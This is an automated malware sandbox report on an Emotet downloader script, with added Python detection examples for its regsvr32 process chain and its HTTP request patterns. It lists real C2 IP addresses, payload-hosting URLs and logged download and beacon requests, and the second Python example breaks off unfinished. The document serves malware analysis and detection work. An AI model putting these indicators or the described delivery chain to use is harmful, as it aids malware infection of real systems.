
Windows Analysis Report
click.wsf

Overview

General Information

Sample Name: click.wsf
Analysis ID: 830321
MD5: 016fa961b9af49d75b597c2f61ab344c
SHA1: 2fee0634cfa2988ee8f000724efc1c6c18beef23
SHA256: 8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 804 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
    • regsvr32.exe (PID: 6508 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6544 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
Name: Emotet
Description: While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it opened up another business channel by selling its infrastructure to deliver additional malicious software. Malware analysts classify it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, but it appears to have sprung back to life in November 2021.
Attribution: GOLD CABIN, MUMMY SPIDER, Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MHq6bwAsAIA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2snoEbwASAJI="]}
Source | Rule | Description | Author | Strings
Note: the ASP webshell rules in this table fire on VBScript primitives (createobject, wscript.shell, mid(, execute) found in wscript.exe memory dumps of the obfuscated click.wsf itself; they corroborate an obfuscated script, not a webshell on the host.
Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp | Rule: webshell_asp_obfuscated | Description: ASP webshell obfuscated | Author: Arnim Rupp | Strings:
  • 0x80c:$tagasp_long20: <script language="VB
  • 0x79f:$asp_payload9: execute "
  • 0xb2:$m_multi_one4: mid(
  • 0x2fb:$m_multi_one4: mid(
  • 0x4c8:$m_multi_one4: mid(
  • 0x6d1:$m_multi_one4: mid(
  • 0xa4c:$m_multi_one4: mid(
Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp | Rule: WEBSHELL_asp_generic | Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file | Author: Arnim Rupp | Strings:
  • 0x312:$asp_gen_obf1: "+"
  • 0x342:$asp_gen_obf1: "+"
  • 0x1bd6:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x7a6:$jsp4: public
  • 0xde6:$jsp4: public
  • 0x126:$asp_input1: request
  • 0x954:$asp_input1: request
  • 0x996:$asp_input1: request
  • 0xaac:$asp_input1: request
  • 0x1e96:$asp_input1: request
  • 0x460:$asp_payload11: wscript.shell
  • 0x48:$asp_multi_payload_one1: createobject
  • 0x136:$asp_multi_payload_one1: createobject
  • 0x1ae:$asp_multi_payload_one1: createobject
  • 0x208:$asp_multi_payload_one1: createobject
  • 0x444:$asp_multi_payload_one1: createobject
  • 0xbaa:$asp_multi_payload_one1: createobject
  • 0xee2:$asp_multi_payload_one1: createobject
  • 0x1db8:$asp_multi_payload_one1: createobject
  • 0x1ea6:$asp_multi_payload_one1: createobject
  • 0x1f1e:$asp_multi_payload_one1: createobject
Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp | Rule: webshell_asp_obfuscated | Description: ASP webshell obfuscated | Author: Arnim Rupp | Strings:
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x13e0:$asp_payload11: wscript.shell
  • 0x93e0:$asp_payload11: wscript.shell
  • 0xb3f0:$asp_payload11: wscript.shell
  • 0xc440:$asp_payload11: wscript.shell
  • 0xfc8:$asp_multi_payload_one1: createobject
  • 0x10b6:$asp_multi_payload_one1: createobject
  • 0x112e:$asp_multi_payload_one1: createobject
  • 0x1188:$asp_multi_payload_one1: createobject
  • 0x13c4:$asp_multi_payload_one1: createobject
  • 0x1b2a:$asp_multi_payload_one1: createobject
  • 0x1e62:$asp_multi_payload_one1: createobject
  • 0x8fc8:$asp_multi_payload_one1: createobject
Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp | Rule: WEBSHELL_asp_generic | Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file | Author: Arnim Rupp | Strings:
  • 0x1292:$asp_gen_obf1: "+"
  • 0x12c2:$asp_gen_obf1: "+"
  • 0x9292:$asp_gen_obf1: "+"
  • 0x92c2:$asp_gen_obf1: "+"
  • 0xb2a2:$asp_gen_obf1: "+"
  • 0xb2d2:$asp_gen_obf1: "+"
  • 0xc2f2:$asp_gen_obf1: "+"
  • 0xc322:$asp_gen_obf1: "+"
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x10a6:$asp_input1: request
  • 0x18d4:$asp_input1: request
  • 0x1916:$asp_input1: request
  • 0x1a2c:$asp_input1: request
Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
(11 entries in this table; not all are shown)

Source | Rule | Description | Author | Strings
Source: 3.2.regsvr32.exe.460000.0.raw.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security
Source: 3.2.regsvr32.exe.460000.0.unpack | Rule: JoeSecurity_Emotet_1 | Description: Yara detected Emotet | Author: Joe Security

        Malware Analysis System Evasion

        Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6404, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, ProcessId: 6508, ProcessName: regsvr32.exe
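The process tree under Classification and the Sigma hit above describe the same chain: wscript.exe (started under OUTLOOK.EXE) runs click.wsf, which launches regsvr32.exe on a *.tmp.dll dropped on the user's Desktop, and that regsvr32 launches a second regsvr32 on a copy of the DLL placed in a random-named subdirectory of System32. The Python below is an added example and not part of the Joe Sandbox report: it turns that chain into two checks run over constructed Sysmon-style process-creation records that reuse the report's command lines (the field names, the root ppids and the benign setup.exe control are assumptions).

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (Sysmon Event ID 1 style) modeled on the
# process tree in the report. The field names, the ppid of the root processes
# and the benign "setup.exe" control are assumptions made for this example.
SAMPLE_EVENTS = [
    {"pid": 804, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail'},
    {"pid": 6404, "ppid": 804, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"'},
    # Quoting below is reproduced as captured in the report (unbalanced).
    {"pid": 6508, "ppid": 6404, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll'},
    {"pid": 6544, "ppid": 6508, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"'},
    # Benign control: a vendor installer registering its own COM DLL.
    {"pid": 6900, "ppid": 1, "image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'"C:\Program Files\Vendor\setup.exe"'},
    {"pid": 7000, "ppid": 6900, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

# A *.tmp.dll under a user profile, the name pattern the downloader script used.
TMP_DLL_RE = re.compile(r'(?i)([a-z]:\\users\\[^"\s]+?\.tmp\.dll)')
# A DLL loaded from a subdirectory directly below System32 (System32\<name>\x.dll).
SYSTEM32_SUBDIR_RE = re.compile(r'(?i)\\windows\\system32\\([^\\"]+)\\[^\\"]+\.dll')


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str
    office_ancestor: bool   # True when an Office process is anywhere up the chain


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def lineage(pid: int, by_pid: dict) -> list:
    """Image basenames from the process up to the oldest ancestor we have events for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: list) -> list:
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "regsvr32.exe":
            continue
        chain = lineage(e["pid"], by_pid)          # chain[0] is this regsvr32 itself
        parent = chain[1] if len(chain) > 1 else ""
        office = any(p in OFFICE_APPS for p in chain[1:])
        m = TMP_DLL_RE.search(e["cmdline"])
        if parent in SCRIPT_HOSTS and m:
            findings.append(Finding(e["pid"], "regsvr32_tmp_dll_from_script_host",
                                    f"{parent} -> regsvr32 {m.group(1)}", office))
        m = SYSTEM32_SUBDIR_RE.search(e["cmdline"])
        if parent == "regsvr32.exe" and m:
            findings.append(Finding(e["pid"], "regsvr32_self_chain_system32_subdir",
                                    f"DLL under System32\\{m.group(1)}", office))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"PID {f.pid}: {f.rule} ({f.detail}); office ancestor={f.office_ancestor}")
```

The two rules are deliberately narrow: regsvr32 is used legitimately by installers, so the checks key on the parent being a script host with a user-profile *.tmp.dll, and on regsvr32 re-launching itself on a DLL in a fresh System32 subdirectory. The Office ancestor flag carries the mail-borne delivery context from the tree into the alert.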
        Timestamp: 03/20/23-09:07:57.133517
        Source IP: 192.168.2.3
        Destination IP: 187.63.160.88
        SID: 2404314
        Source Port: 49735
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:07:41.132019
        Source IP: 192.168.2.3
        Destination IP: 182.162.143.56
        SID: 2404312
        Source Port: 49734
        Destination Port: 443
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:08:15.086032
        Source IP: 192.168.2.3
        Destination IP: 104.168.155.143
        SID: 2404302
        Source Port: 49738
        Destination Port: 8080
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:07:19.650620
        Source IP: 192.168.2.3
        Destination IP: 91.121.146.47
        SID: 2404344
        Source Port: 49731
        Destination Port: 8080
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:08:10.886539
        Source IP: 192.168.2.3
        Destination IP: 164.90.222.65
        SID: 2404308
        Source Port: 49737
        Destination Port: 443
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:08:05.635641
        Source IP: 192.168.2.3
        Destination IP: 167.172.199.165
        SID: 2404310
        Source Port: 49736
        Destination Port: 8080
        Protocol: TCP
        Classtype: A Network Trojan was detected
        Timestamp: 03/20/23-09:07:25.133944
        Source IP: 192.168.2.3
        Destination IP: 66.228.32.31
        SID: 2404330
        Source Port: 49733
        Destination Port: 7080
        Protocol: TCP
        Classtype: A Network Trojan was detected


        AV Detection

        Source: http://softwareulike.com/cWIYxWMPkK/ | Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0 | Avira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX | Avira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X | Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ | Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK | Avira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/Y | Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z | Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/ | Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/ | Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/vM | Avira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/l | Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006 | Avira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/ | Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz | Avira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/ | Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/) | Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/ | Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM | Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/tM | Avira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/4 | Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM | Avira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ | Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/ | Avira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/yM | Avira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL | Avira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/xM | Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll | Avira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/P | Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/l | Avira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/ | Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ | Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM | Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/ | Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll( | Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/0w | Avira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/_ | Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476 | Avira URL Cloud: Label: malware
        Source: bbvoyage.com | Virustotal: Detection: 8%
        Source: penshorn.org | Virustotal: Detection: 14%
        Source: www.gomespontes.com.br | Virustotal: Detection: 5%
        Source: C:\Users\user\Desktop\rad75349.tmp.dll | ReversingLabs: Detection: 79%
        Source: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy) | ReversingLabs: Detection: 79%
        Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet (the C2 list and public keys are the configuration shown under Classification above)
        Source: unknown | HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180008D28 FindFirstFileExW,

        Networking

        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exe | Network Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exe | Domain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exe | Domain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exe | Domain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 163.44.196.120 8080
        Source: Traffic | Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: Traffic | Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: Traffic | Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49734 -> 182.162.143.56:443
        Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49735 -> 187.63.160.88:80
        Source: Traffic | Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: Traffic | Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49737 -> 164.90.222.65:443
        Source: Traffic | Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: Malware configuration extractor | IPs: 91.121.146.47:8080
        Source: Malware configuration extractor | IPs: 66.228.32.31:7080
        Source: Malware configuration extractor | IPs: 182.162.143.56:443
        Source: Malware configuration extractor | IPs: 187.63.160.88:80
        Source: Malware configuration extractor | IPs: 167.172.199.165:8080
        Source: Malware configuration extractor | IPs: 164.90.222.65:443
        Source: Malware configuration extractor | IPs: 104.168.155.143:8080
        Source: Malware configuration extractor | IPs: 163.44.196.120:8080
        Source: Malware configuration extractor | IPs: 160.16.142.56:8080
        Source: Malware configuration extractor | IPs: 159.89.202.34:443
        Source: Malware configuration extractor | IPs: 159.65.88.10:8080
        Source: Malware configuration extractor | IPs: 186.194.240.217:443
        Source: Malware configuration extractor | IPs: 149.56.131.28:8080
        Source: Malware configuration extractor | IPs: 72.15.201.15:8080
        Source: Malware configuration extractor | IPs: 1.234.2.232:8080
        Source: Malware configuration extractor | IPs: 82.223.21.224:8080
        Source: Malware configuration extractor | IPs: 206.189.28.199:8080
        Source: Malware configuration extractor | IPs: 169.57.156.166:8080
        Source: Malware configuration extractor | IPs: 107.170.39.149:8080
        Source: Malware configuration extractor | IPs: 103.43.75.120:443
        Source: Malware configuration extractor | IPs: 91.207.28.33:8080
        Source: Malware configuration extractor | IPs: 213.239.212.5:443
        Source: Malware configuration extractor | IPs: 45.235.8.30:8080
        Source: Malware configuration extractor | IPs: 119.59.103.152:8080
        Source: Malware configuration extractor | IPs: 164.68.99.3:8080
        Source: Malware configuration extractor | IPs: 95.217.221.146:8080
        Source: Malware configuration extractor | IPs: 153.126.146.25:7080
        Source: Malware configuration extractor | IPs: 197.242.150.244:8080
        Source: Malware configuration extractor | IPs: 202.129.205.3:8080
        Source: Malware configuration extractor | IPs: 103.132.242.26:8080
        Source: Malware configuration extractor | IPs: 139.59.126.41:443
        Source: Malware configuration extractor | IPs: 110.232.117.186:8080
        Source: Malware configuration extractor | IPs: 183.111.227.137:8080
        Source: Malware configuration extractor | IPs: 5.135.159.50:443
        Source: Malware configuration extractor | IPs: 201.94.166.162:443
        Source: Malware configuration extractor | IPs: 103.75.201.2:443
        Source: Malware configuration extractor | IPs: 79.137.35.198:8080
        Source: Malware configuration extractor | IPs: 172.105.226.75:8080
        Source: Malware configuration extractor | IPs: 94.23.45.86:4143
        Source: Malware configuration extractor | IPs: 115.68.227.76:8080
        Source: Malware configuration extractor | IPs: 153.92.5.27:8080
        Source: Malware configuration extractor | IPs: 167.172.253.162:8080
        Source: Malware configuration extractor | IPs: 188.44.20.25:443
        Source: Malware configuration extractor | IPs: 147.139.166.154:8080
        Source: Malware configuration extractor | IPs: 129.232.188.93:443
        Source: Malware configuration extractor | IPs: 173.212.193.249:8080
        Source: Malware configuration extractor | IPs: 185.4.135.165:8080
        Source: Malware configuration extractor | IPs: 45.176.232.124:443
        Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
        Source: global traffic | HTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1
            Connection: Keep-Alive
            Content-Length: 0
            Host: 164.90.222.65
        Source: Joe Sandbox View | IP Address: 52.109.13.63
        Source: global traffic | HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
            Host: penshorn.org
        Source: global traffic | HTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
            Host: bbvoyage.com
        Source: global traffic | HTTP traffic detected: GET /logs/pd/ HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
            Host: www.gomespontes.com.br
        Source: global traffic | TCP traffic: 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: global traffic | TCP traffic: 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: global traffic | TCP traffic: 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: global traffic | TCP traffic: 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: global traffic | TCP traffic: 192.168.2.3:49739 -> 163.44.196.120:8080
        Source: global traffic | TCP traffic: 192.168.2.3:49740 -> 160.16.142.56:8080
        Source: unknown | Network traffic detected: IP country count 18
        Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 20 Mar 2023 08:06:38 GMT
            Server: Apache
            X-Powered-By: PHP/7.0.33
            Content-Length: 0
            Connection: close
            Content-Type: text/html;charset=utf-8
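The three GETs from wscript.exe above carry User-Agent "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)", the default user agent of the WinHttp.WinHttpRequest COM object used from script, while the POST from regsvr32.exe to 164.90.222.65 has no User-Agent and Content-Length: 0 (the "HTTP GET or POST without a user agent" signature). The Python below is an added example, not part of the report: it runs those request-shape heuristics over constructed proxy-style log lines modeled on the requests on this page (the log format, the timestamps, the request to 104.168.155.143:8080 and the two benign control lines are assumptions).

```python
import ipaddress
import re
from collections import Counter

# Constructed proxy-style log lines modeled on the HTTP requests in the report.
# The line format is an assumption for this example; lines 1-4 mirror the
# report's three GETs and the POST to 164.90.222.65, line 5 is an assumed
# request on the 104.168.155.143:8080 connection, lines 6-7 are benign controls.
SAMPLE_LOG = """\
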